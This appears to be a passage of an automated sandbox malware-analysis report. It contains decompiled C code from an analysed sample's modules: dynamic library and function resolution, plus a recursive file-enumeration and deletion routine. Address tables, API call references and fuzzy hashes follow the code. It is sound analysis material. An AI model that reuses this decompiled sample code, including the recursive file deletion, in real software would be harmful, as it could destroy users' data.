                                                										_push(2);
                                                										goto L107;
                                                									case 0xf:
                                                										_push(3);
                                                										goto L107;
                                                									case 0x10:
                                                										_push(0x17);
                                                										L127:
                                                										_pop(__ebx);
                                                										goto L92;
                                                									case 0x11:
                                                										__eax =  &_v12;
                                                										__eax = E10001A9F( &_v12);
                                                										__ebx = __eax;
                                                										__ebx = __eax + 1;
                                                										__eflags = __ebx - 0xb;
                                                										if(__ebx < 0xb) {
                                                											__ebx = __ebx + 0xa;
                                                										}
                                                										goto L91;
                                                									case 0x12:
                                                										__ebx = 0xffffffff;
                                                										goto L92;
                                                									case 0x13:
                                                										_v48 = _v48 + 1;
                                                										_push(4);
                                                										_pop(__eax);
                                                										goto L85;
                                                									case 0x14:
                                                										__eax = 0;
                                                										__eflags = 0;
                                                										goto L85;
                                                									case 0x15:
                                                										_push(4);
                                                										L107:
                                                										_pop(__eax);
                                                										L85:
                                                										__edi = _v16;
                                                										__ecx =  *(0x1000305c + __eax * 4);
                                                										__edi = _v16 << 5;
                                                										__edx = 0;
                                                										__edi = (_v16 << 5) + __esi;
                                                										__edx = 1;
                                                										__eflags = _v8 - 0xffffffff;
                                                										_v40 = 1;
                                                										 *(__edi + 0x1018) = __eax;
                                                										if(_v8 == 0xffffffff) {
                                                											L87:
                                                											__ecx = __edx;
                                                											L88:
                                                											__eflags = _v8 - __edx;
                                                											 *(__edi + 0x1028) = __ecx;
                                                											if(_v8 == __edx) {
                                                												__eax =  &_v12;
                                                												__eax = E10001A9F( &_v12);
                                                												__eax = __eax + 1;
                                                												__eflags = __eax;
                                                												_v8 = __eax;
                                                											}
                                                											__eax = _v8;
                                                											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                											_t133 = _v16 + 0x81; // 0x81
                                                											_t133 = _t133 << 5;
                                                											__eax = 0;
                                                											__eflags = 0;
                                                											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                											goto L91;
                                                										}
                                                										__eflags = __ecx;
                                                										if(__ecx > 0) {
                                                											goto L88;
                                                										}
                                                										goto L87;
                                                									case 0x16:
                                                										_t262 =  *(_t319 + 0x1014);
                                                										__eflags = _t262 - _v16;
                                                										if(_t262 > _v16) {
                                                											_v16 = _t262;
                                                										}
                                                										_v8 = _v8 & 0x00000000;
                                                										_v20 = _v20 & 0x00000000;
                                                										_v36 - 3 = _t262 - (_v36 == 3);
                                                										if(_t262 != _v36 == 3) {
                                                											L79:
                                                											_v40 = 1;
                                                										}
                                                										goto L61;
                                                									case 0x17:
                                                										__eax =  &_v12;
                                                										__eax = E10001A9F( &_v12);
                                                										__ebx = __eax;
                                                										__ebx = __eax + 1;
                                                										L91:
                                                										__eflags = __ebx;
                                                										if(__ebx == 0) {
                                                											goto L61;
                                                										}
                                                										L92:
                                                										__eflags = _v20;
                                                										_v40 = 1;
                                                										if(_v20 != 0) {
                                                											L97:
                                                											__eflags = _v20 - 1;
                                                											if(_v20 == 1) {
                                                												__eax = _v16;
                                                												__eax = _v16 << 5;
                                                												__eflags = __eax;
                                                												 *(__eax + __esi + 0x102c) = __ebx;
                                                											}
                                                											goto L99;
                                                										}
                                                										_v16 = _v16 << 5;
                                                										_t141 = __esi + 0x1030; // 0x1030
                                                										__edi = (_v16 << 5) + _t141;
                                                										__eax =  *__edi;
                                                										__eflags = __eax - 0xffffffff;
                                                										if(__eax <= 0xffffffff) {
                                                											L95:
                                                											__eax = GlobalFree(__eax);
                                                											L96:
                                                											 *__edi = __ebx;
                                                											goto L97;
                                                										}
                                                										__eflags = __eax - 0x19;
                                                										if(__eax <= 0x19) {
                                                											goto L96;
                                                										}
                                                										goto L95;
                                                									case 0x18:
                                                										goto L61;
                                                								}
                                                							}
                                                							_t263 = _t259 - 1;
                                                							__eflags = _t263;
                                                							if(_t263 == 0) {
                                                								_v16 = _t284;
                                                								goto L74;
                                                							}
                                                							__eflags = _t263 != 1;
                                                							if(_t263 != 1) {
                                                								goto L141;
                                                							}
                                                							_t266 = _t287 - 0x21;
                                                							__eflags = _t266;
                                                							if(_t266 == 0) {
                                                								_v8 =  ~_v8;
                                                								goto L61;
                                                							}
                                                							_t267 = _t266 - 0x42;
                                                							__eflags = _t267;
                                                							if(_t267 == 0) {
                                                								L57:
                                                								__eflags = _v8 - 1;
                                                								if(_v8 != 1) {
                                                									_t92 = _t319 + 0x1010;
                                                									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                									__eflags =  *_t92;
                                                								} else {
                                                									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                								}
                                                								_v8 = 1;
                                                								goto L61;
                                                							}
                                                							_t272 = _t267;
                                                							__eflags = _t272;
                                                							if(_t272 == 0) {
                                                								_push(0x20);
                                                								L56:
                                                								_pop(1);
                                                								goto L57;
                                                							}
                                                							_t273 = _t272 - 9;
                                                							__eflags = _t273;
                                                							if(_t273 == 0) {
                                                								_push(8);
                                                								goto L56;
                                                							}
                                                							_t274 = _t273 - 4;
                                                							__eflags = _t274;
                                                							if(_t274 == 0) {
                                                								_push(4);
                                                								goto L56;
                                                							}
                                                							_t275 = _t274 - 1;
                                                							__eflags = _t275;
                                                							if(_t275 == 0) {
                                                								_push(0x10);
                                                								goto L56;
                                                							}
                                                							__eflags = _t275 != 0;
                                                							if(_t275 != 0) {
                                                								goto L61;
                                                							}
                                                							_push(0x40);
                                                							goto L56;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t278 = _t249 - 5;
                                                					if(_t278 == 0) {
                                                						__eflags = _v36 - 3;
                                                						_v32 = 1;
                                                						_v8 = _t284;
                                                						_v20 = _t284;
                                                						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                						_v40 = _t284;
                                                						goto L17;
                                                					}
                                                					_t282 = _t278 - 1;
                                                					if(_t282 == 0) {
                                                						_v32 = 2;
                                                						_v8 = _t284;
                                                						_v20 = _t284;
                                                						goto L17;
                                                					}
                                                					if(_t282 != 0x16) {
                                                						goto L40;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L17;
                                                					}
                                                				}
                                                				GlobalFree(_v52);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v44);
                                                				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                					L161:
                                                					return _t319;
                                                				} else {
                                                					_t216 =  *_t319 - 1;
                                                					if(_t216 == 0) {
                                                						_t178 = _t319 + 8; // 0x8
                                                						_t312 = _t178;
                                                						__eflags =  *_t312 - _t284;
                                                						if( *_t312 != _t284) {
                                                							_t217 = GetModuleHandleW(_t312);
                                                							__eflags = _t217 - _t284;
                                                							 *(_t319 + 0x1008) = _t217;
                                                							if(_t217 != _t284) {
                                                								L150:
                                                								_t183 = _t319 + 0x808; // 0x808
                                                								_t313 = _t183;
                                                								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                								__eflags = _t218 - _t284;
                                                								 *(_t319 + 0x100c) = _t218;
                                                								if(_t218 == _t284) {
                                                									__eflags =  *_t313 - 0x23;
                                                									if( *_t313 == 0x23) {
                                                										_t186 = _t319 + 0x80a; // 0x80a
                                                										_t222 = E10001311(_t186);
                                                										__eflags = _t222 - _t284;
                                                										if(_t222 != _t284) {
                                                											__eflags = _t222 & 0xffff0000;
                                                											if((_t222 & 0xffff0000) == 0) {
                                                												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v48 - _t284;
                                                								if(_v48 != _t284) {
                                                									L157:
                                                									_t313[lstrlenW(_t313)] = 0x57;
                                                									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                									__eflags = _t220 - _t284;
                                                									if(_t220 != _t284) {
                                                										L145:
                                                										 *(_t319 + 0x100c) = _t220;
                                                										goto L161;
                                                									}
                                                									__eflags =  *(_t319 + 0x100c) - _t284;
                                                									L159:
                                                									if(__eflags != 0) {
                                                										goto L161;
                                                									}
                                                									L160:
                                                									_t197 = _t319 + 4;
                                                									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                									__eflags =  *_t197;
                                                									goto L161;
                                                								} else {
                                                									__eflags =  *(_t319 + 0x100c) - _t284;
                                                									if( *(_t319 + 0x100c) != _t284) {
                                                										goto L161;
                                                									}
                                                									goto L157;
                                                								}
                                                							}
                                                							_t225 = LoadLibraryW(_t312);
                                                							__eflags = _t225 - _t284;
                                                							 *(_t319 + 0x1008) = _t225;
                                                							if(_t225 == _t284) {
                                                								goto L160;
                                                							}
                                                							goto L150;
                                                						}
                                                						_t179 = _t319 + 0x808; // 0x808
                                                						_t227 = E10001311(_t179);
                                                						 *(_t319 + 0x100c) = _t227;
                                                						__eflags = _t227 - _t284;
                                                						goto L159;
                                                					}
                                                					_t228 = _t216 - 1;
                                                					if(_t228 == 0) {
                                                						_t176 = _t319 + 0x808; // 0x808
                                                						_t229 = _t176;
                                                						__eflags =  *_t229 - _t284;
                                                						if( *_t229 == _t284) {
                                                							goto L161;
                                                						}
                                                						_t220 = E10001311(_t229);
                                                						L144:
                                                						goto L145;
                                                					}
                                                					if(_t228 != 1) {
                                                						goto L161;
                                                					}
                                                					_t80 = _t319 + 8; // 0x8
                                                					_t285 = _t80;
                                                					_t314 = E10001311(_t80);
                                                					 *(_t319 + 0x1008) = _t314;
                                                					if(_t314 == 0) {
                                                						goto L160;
                                                					}
                                                					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                					_t89 = _t319 + 0x808; // 0x808
                                                					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                					goto L144;
                                                				}
                                                			}
































































                                                0x10001b20
                                                0x10001b23
                                                0x10001b26
                                                0x10001b29
                                                0x10001b2c
                                                0x10001b2f
                                                0x10001b32
                                                0x10001b34
                                                0x10001b37
                                                0x10001b3c
                                                0x10001b3f
                                                0x10001b47
                                                0x10001b4f
                                                0x10001b51
                                                0x10001b54
                                                0x10001b5c
                                                0x10001b5c
                                                0x10001b61
                                                0x10001b64
                                                0x00000000
                                                0x00000000
                                                0x10001b6e
                                                0x10001b71
                                                0x10001b76
                                                0x10001b78
                                                0x10001beb
                                                0x10001beb
                                                0x10001beb
                                                0x10001bef
                                                0x10001bf2
                                                0x10001bf4
                                                0x10001c16
                                                0x10001c18
                                                0x10001c1b
                                                0x10001c24
                                                0x10001c2a
                                                0x10001c2c
                                                0x10001c32
                                                0x10001c32
                                                0x10001c38
                                                0x10001c3b
                                                0x10001c3b
                                                0x10001c3e
                                                0x10001c3e
                                                0x10001c44
                                                0x10001c46
                                                0x10001c46
                                                0x10001c48
                                                0x10001c4b
                                                0x10001c4e
                                                0x10001c54
                                                0x10001c5a
                                                0x10001c5d
                                                0x10001c81
                                                0x10001c84
                                                0x00000000
                                                0x00000000
                                                0x10001c87
                                                0x10001c89
                                                0x10001c97
                                                0x10001c9a
                                                0x10001c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001c9e
                                                0x10001c9e
                                                0x10001c9e
                                                0x10001ca4
                                                0x10001ca6
                                                0x00000000
                                                0x00000000
                                                0x10001ca8
                                                0x10001caa
                                                0x10001cac
                                                0x10001cae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001cae
                                                0x10001cb0
                                                0x10001cb2
                                                0x10001cb4
                                                0x10001cb4
                                                0x10001cba
                                                0x10001cc0
                                                0x10001cc2
                                                0x10001cd6
                                                0x10001cd6
                                                0x10001cd8
                                                0x10001cc4
                                                0x10001cca
                                                0x10001ccd
                                                0x10001ccd
                                                0x00000000
                                                0x10001c5f
                                                0x10001c5f
                                                0x10001c5f
                                                0x10001c60
                                                0x10001c68
                                                0x10001c6c
                                                0x10001c72
                                                0x10001c76
                                                0x10001cde
                                                0x10001ce1
                                                0x10001ce5
                                                0x10001d70
                                                0x10001d74
                                                0x10001b59
                                                0x00000000
                                                0x10001b59
                                                0x00000000
                                                0x10001d74
                                                0x10001c62
                                                0x10001c62
                                                0x10001c63
                                                0x00000000
                                                0x00000000
                                                0x10001c65
                                                0x10001c66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001c66
                                                0x10001c5d
                                                0x10001bf7
                                                0x00000000
                                                0x00000000
                                                0x10001c00
                                                0x10001c03
                                                0x10001c10
                                                0x10001c10
                                                0x10001c05
                                                0x00000000
                                                0x10001c05
                                                0x10001b7a
                                                0x10001b7d
                                                0x10001bce
                                                0x10001bd1
                                                0x10001be3
                                                0x10001be3
                                                0x10001be6
                                                0x00000000
                                                0x10001be6
                                                0x10001bd3
                                                0x10001bd8
                                                0x00000000
                                                0x00000000
                                                0x10001bda
                                                0x10001bdd
                                                0x10001ced
                                                0x10001cf0
                                                0x10001cf0
                                                0x10001cf2
                                                0x10002048
                                                0x1000204b
                                                0x100020b2
                                                0x10001d60
                                                0x10001d63
                                                0x10001d66
                                                0x10001d69
                                                0x10001d69
                                                0x10001d6b
                                                0x10001d6c
                                                0x10001d6c
                                                0x10001d6d
                                                0x00000000
                                                0x10001d6d
                                                0x1000204d
                                                0x10002050
                                                0x10002057
                                                0x10002057
                                                0x1000205b
                                                0x1000206f
                                                0x1000206f
                                                0x10002072
                                                0x10002076
                                                0x100020be
                                                0x100020c1
                                                0x100020c5
                                                0x00000000
                                                0x100020c5
                                                0x10002078
                                                0x1000207c
                                                0x00000000
                                                0x00000000
                                                0x1000207e
                                                0x10002085
                                                0x10002085
                                                0x1000208b
                                                0x1000208e
                                                0x100020aa
                                                0x10002090
                                                0x10002099
                                                0x1000209c
                                                0x1000209c
                                                0x00000000
                                                0x1000208e
                                                0x1000205d
                                                0x10002060
                                                0x10002064
                                                0x00000000
                                                0x00000000
                                                0x10002066
                                                0x00000000
                                                0x10002066
                                                0x10002052
                                                0x10002055
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002055
                                                0x10001cf8
                                                0x10001cf8
                                                0x10001cf9
                                                0x10001e29
                                                0x10001e29
                                                0x10001e2e
                                                0x10001e31
                                                0x00000000
                                                0x00000000
                                                0x10001e3e
                                                0x00000000
                                                0x10001fe5
                                                0x10001fe8
                                                0x10001feb
                                                0x10001feb
                                                0x10001fec
                                                0x10001fed
                                                0x10001ff0
                                                0x10001ff3
                                                0x10001ff6
                                                0x00000000
                                                0x00000000
                                                0x10001ff8
                                                0x10001ff8
                                                0x10001ffc
                                                0x10002014
                                                0x10002017
                                                0x10002021
                                                0x00000000
                                                0x10002021
                                                0x10001ffe
                                                0x10001ffe
                                                0x10002001
                                                0x00000000
                                                0x00000000
                                                0x10002003
                                                0x10002006
                                                0x10002008
                                                0x10002009
                                                0x10002009
                                                0x10002009
                                                0x1000200a
                                                0x1000200d
                                                0x10002010
                                                0x10002011
                                                0x10001feb
                                                0x10001fec
                                                0x10001fed
                                                0x10001ff0
                                                0x10001ff3
                                                0x10001ff6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001ff6
                                                0x00000000
                                                0x10001e85
                                                0x00000000
                                                0x00000000
                                                0x10001e91
                                                0x00000000
                                                0x00000000
                                                0x10001e78
                                                0x10001e7c
                                                0x10001e80
                                                0x00000000
                                                0x00000000
                                                0x10001fb6
                                                0x10001fba
                                                0x00000000
                                                0x00000000
                                                0x10001fc0
                                                0x10001fc9
                                                0x10001fd0
                                                0x10001fd8
                                                0x00000000
                                                0x00000000
                                                0x10001f53
                                                0x10001f53
                                                0x00000000
                                                0x00000000
                                                0x10001e9a
                                                0x00000000
                                                0x00000000
                                                0x10002040
                                                0x00000000
                                                0x00000000
                                                0x10002030
                                                0x00000000
                                                0x00000000
                                                0x10002034
                                                0x00000000
                                                0x00000000
                                                0x1000203c
                                                0x00000000
                                                0x00000000
                                                0x10001f76
                                                0x00000000
                                                0x00000000
                                                0x10001f5b
                                                0x10001f5d
                                                0x00000000
                                                0x00000000
                                                0x10001f7e
                                                0x00000000
                                                0x00000000
                                                0x10001f63
                                                0x00000000
                                                0x00000000
                                                0x10001f67
                                                0x00000000
                                                0x00000000
                                                0x10002038
                                                0x10002042
                                                0x10002042
                                                0x00000000
                                                0x00000000
                                                0x10001f86
                                                0x10001f8a
                                                0x10001f8f
                                                0x10001f92
                                                0x10001f93
                                                0x10001f96
                                                0x10001f9c
                                                0x10001f9c
                                                0x00000000
                                                0x00000000
                                                0x10002028
                                                0x00000000
                                                0x00000000
                                                0x10001f6b
                                                0x10001f6e
                                                0x10001f70
                                                0x00000000
                                                0x00000000
                                                0x10001ea1
                                                0x10001ea1
                                                0x00000000
                                                0x00000000
                                                0x10001f7a
                                                0x10001f80
                                                0x10001f80
                                                0x10001ea3
                                                0x10001ea3
                                                0x10001ea6
                                                0x10001ead
                                                0x10001eb0
                                                0x10001eb2
                                                0x10001eb4
                                                0x10001eb5
                                                0x10001eb9
                                                0x10001ebc
                                                0x10001ec2
                                                0x10001ec8
                                                0x10001ec8
                                                0x10001eca
                                                0x10001eca
                                                0x10001ecd
                                                0x10001ed3
                                                0x10001ed5
                                                0x10001ed9
                                                0x10001ede
                                                0x10001ede
                                                0x10001ee0
                                                0x10001ee0
                                                0x10001ee3
                                                0x10001ee6
                                                0x10001eef
                                                0x10001ef5
                                                0x10001ef8
                                                0x10001ef8
                                                0x10001efa
                                                0x10001efd
                                                0x10001f03
                                                0x00000000
                                                0x10001f03
                                                0x10001ec4
                                                0x10001ec6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e45
                                                0x10001e4b
                                                0x10001e4e
                                                0x10001e50
                                                0x10001e50
                                                0x10001e53
                                                0x10001e57
                                                0x10001e64
                                                0x10001e66
                                                0x10001e6c
                                                0x10001e6c
                                                0x10001e6c
                                                0x00000000
                                                0x00000000
                                                0x10001fa4
                                                0x10001fa8
                                                0x10001fad
                                                0x10001fb0
                                                0x10001f09
                                                0x10001f09
                                                0x10001f0b
                                                0x00000000
                                                0x00000000
                                                0x10001f11
                                                0x10001f11
                                                0x10001f15
                                                0x10001f1c
                                                0x10001f40
                                                0x10001f40
                                                0x10001f44
                                                0x10001f46
                                                0x10001f49
                                                0x10001f49
                                                0x10001f4c
                                                0x10001f4c
                                                0x00000000
                                                0x10001f44
                                                0x10001f21
                                                0x10001f24
                                                0x10001f24
                                                0x10001f2b
                                                0x10001f2d
                                                0x10001f30
                                                0x10001f37
                                                0x10001f38
                                                0x10001f3e
                                                0x10001f3e
                                                0x00000000
                                                0x10001f3e
                                                0x10001f32
                                                0x10001f35
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e3e
                                                0x10001cff
                                                0x10001cff
                                                0x10001d00
                                                0x10001e26
                                                0x00000000
                                                0x10001e26
                                                0x10001d06
                                                0x10001d07
                                                0x00000000
                                                0x00000000
                                                0x10001d0f
                                                0x10001d0f
                                                0x10001d12
                                                0x10001d5d
                                                0x00000000
                                                0x10001d5d
                                                0x10001d14
                                                0x10001d14
                                                0x10001d17
                                                0x10001d41
                                                0x10001d44
                                                0x10001d47
                                                0x10001e18
                                                0x10001e18
                                                0x10001e18
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001e1e
                                                0x00000000
                                                0x10001e1e
                                                0x10001d1a
                                                0x10001d1a
                                                0x10001d1b
                                                0x10001d3e
                                                0x10001d40
                                                0x10001d40
                                                0x00000000
                                                0x10001d40
                                                0x10001d1d
                                                0x10001d1d
                                                0x10001d20
                                                0x10001d3a
                                                0x00000000
                                                0x10001d3a
                                                0x10001d22
                                                0x10001d22
                                                0x10001d25
                                                0x10001d36
                                                0x00000000
                                                0x10001d36
                                                0x10001d27
                                                0x10001d27
                                                0x10001d28
                                                0x10001d32
                                                0x00000000
                                                0x10001d32
                                                0x10001d2b
                                                0x10001d2c
                                                0x00000000
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001bdd
                                                0x10001b7f
                                                0x10001b82
                                                0x10001bb1
                                                0x10001bb5
                                                0x10001bbc
                                                0x10001bc3
                                                0x10001bc6
                                                0x10001bc9
                                                0x00000000
                                                0x10001bc9
                                                0x10001b84
                                                0x10001b85
                                                0x10001ba0
                                                0x10001ba7
                                                0x10001baa
                                                0x00000000
                                                0x10001baa
                                                0x10001b8a
                                                0x00000000
                                                0x10001b90
                                                0x10001b90
                                                0x10001b97
                                                0x00000000
                                                0x10001b97
                                                0x10001b8a
                                                0x10001d83
                                                0x10001d88
                                                0x10001d8d
                                                0x10001d91
                                                0x100021c5
                                                0x100021cb
                                                0x10001da3
                                                0x10001da5
                                                0x10001da6
                                                0x100020ee
                                                0x100020ee
                                                0x100020f1
                                                0x100020f4
                                                0x10002111
                                                0x10002117
                                                0x10002119
                                                0x1000211f
                                                0x10002136
                                                0x10002136
                                                0x10002136
                                                0x10002143
                                                0x10002149
                                                0x1000214c
                                                0x10002152
                                                0x10002154
                                                0x10002158
                                                0x1000215a
                                                0x10002161
                                                0x10002166
                                                0x10002169
                                                0x1000216b
                                                0x10002170
                                                0x10002182
                                                0x10002182
                                                0x10002170
                                                0x10002169
                                                0x10002158
                                                0x10002188
                                                0x1000218b
                                                0x10002195
                                                0x1000219d
                                                0x100021aa
                                                0x100021b0
                                                0x100021b3
                                                0x100020e3
                                                0x100020e3
                                                0x00000000
                                                0x100020e3
                                                0x100021b9
                                                0x100021bf
                                                0x100021bf
                                                0x00000000
                                                0x00000000
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x00000000
                                                0x1000218d
                                                0x1000218d
                                                0x10002193
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002193
                                                0x1000218b
                                                0x10002122
                                                0x10002128
                                                0x1000212a
                                                0x10002130
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002130
                                                0x100020f6
                                                0x100020fd
                                                0x10002103
                                                0x10002109
                                                0x00000000
                                                0x10002109
                                                0x10001dac
                                                0x10001dad
                                                0x100020cd
                                                0x100020cd
                                                0x100020d3
                                                0x100020d6
                                                0x00000000
                                                0x00000000
                                                0x100020dd
                                                0x100020e2
                                                0x00000000
                                                0x100020e2
                                                0x10001db4
                                                0x00000000
                                                0x00000000
                                                0x10001dba
                                                0x10001dba
                                                0x10001dc3
                                                0x10001dc8
                                                0x10001dce
                                                0x00000000
                                                0x00000000
                                                0x10001dd4
                                                0x10001de1
                                                0x10001de7
                                                0x10001df1
                                                0x10001df7
                                                0x10001dff
                                                0x10001e0f
                                                0x00000000
                                                0x10001e0f

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID:
                                                • API String ID: 4227406936-0
                                                • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 764 405a03-405a29 call 405cce 767 405a42-405a49 764->767 768 405a2b-405a3d DeleteFileW 764->768 770 405a4b-405a4d 767->770 771 405a5c-405a6c call 406212 767->771 769 405bbf-405bc3 768->769 772 405a53-405a56 770->772 773 405b6d-405b72 770->773 777 405a7b-405a7c call 405c12 771->777 778 405a6e-405a79 lstrcatW 771->778 772->771 772->773 773->769 776 405b74-405b77 773->776 779 405b81-405b89 call 406555 776->779 780 405b79-405b7f 776->780 781 405a81-405a85 777->781 778->781 779->769 787 405b8b-405b9f call 405bc6 call 4059bb 779->787 780->769 784 405a91-405a97 lstrcatW 781->784 785 405a87-405a8f 781->785 788 405a9c-405ab8 lstrlenW FindFirstFileW 784->788 785->784 785->788 804 405ba1-405ba4 787->804 805 405bb7-405bba call 405371 787->805 790 405b62-405b66 788->790 791 405abe-405ac6 788->791 790->773 795 405b68 790->795 792 405ae6-405afa call 406212 791->792 793 405ac8-405ad0 791->793 806 405b11-405b1c call 4059bb 792->806 807 405afc-405b04 792->807 796 405ad2-405ada 793->796 797 405b45-405b55 FindNextFileW 793->797 795->773 796->792 800 405adc-405ae4 796->800 797->791 803 405b5b-405b5c FindClose 797->803 800->792 800->797 803->790 804->780 808 405ba6-405bb5 call 405371 call 4060b3 804->808 805->769 817 405b3d-405b40 call 405371 806->817 818 405b1e-405b21 806->818 807->797 809 405b06-405b0f call 405a03 807->809 808->769 809->797 817->797 821 405b23-405b33 call 405371 call 4060b3 818->821 822 405b35-405b3b 818->822 821->797 822->797
                                                C-Code - Quality: 98%
                                                			E00405A03(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405CCE(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x42a2c8 =  *0x42a2c8 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E00406212(0x425730, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405C12(_t68);
                                                					} else {
                                                						lstrcatW(0x425730, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E00406212(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E004059BB(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E00405371(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x42a2c8 =  *0x42a2c8 + 1;
                                                										} else {
                                                											E00405371(0xfffffff1, _t68);
                                                											E004060B3(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405A03(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
